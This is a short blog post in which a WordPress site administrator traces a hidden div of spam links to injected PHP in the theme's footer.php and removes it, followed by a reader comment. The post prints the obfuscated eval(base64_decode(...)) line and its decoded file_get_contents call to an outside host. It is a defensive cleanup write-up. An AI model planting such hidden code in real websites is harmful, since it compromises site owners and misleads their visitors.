Random div in WordPress with “position:absolute;filter:alpha(opacity=0);opacity:0.001;z-index:10”

Hello all,

I was notified about a random div that is not supposed to be on a site I administer.

There was a div with a style of

position:absolute;filter:alpha(opacity=0);opacity:0.001;z-index:10

and a bunch of random links (see image below).

Searching for anything that is in that div gave no results. So I decided to track down where it is being generated.

The first thing to blame were scripts… Using Network analysis tab in Chrome I refreshed the website and checked the first request that was made (it was for the html file). The response already had that div in the HTML code. This meant that the whole thing has to be happening on the server and it is not added later by a script.

I tracked down the place in the template where the div was located (it was in footer.php file) and found:

<?php
$c3RyX = “lFBQu3”;
@eval(base64_decode(“ZWNobyBmaWxlX2dldF9jb250ZW50cygiaHR0cDovL3NoZWxsLm5ueHV1LmNvbS9pbmRleC5waHA/cj1saW5rcyZ2PSRjM1J5WCIp”).”;”);
?>

Decoding the string in the eval function confirmed the suspicion:

echo file_get_contents(“http://shell.nnxuu.com/index.php?r=links&v=$c3RyX&#8221;)

This was definitely added maliciously and had to be removed.

After changing all the passwords and removing the previously mentioned php code bit the site is up and running as expected.

randomlinks

Advertisements

About Vaidas Sirtautas

http://vsshs.com

Posted on September 28, 2014, in Web and tagged . Bookmark the permalink. 2 Comments.

  1. I have the same problem, any chance you can guide me how to fix it. I know how to fix each page but I need help removing the php code. I also would like to know how this happened.

    • Hey,

      You just have to find where the html code is generated and delete that bit.

      As for how it happened, I am not sure. Since this was a development site the passwords were really weak, so I changed all of them to a much stronger ones and the problem does not seem to be repeating.

      Unfortunately request logging was turned off so I am not sure how/when exactly this happened.

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s

%d bloggers like this: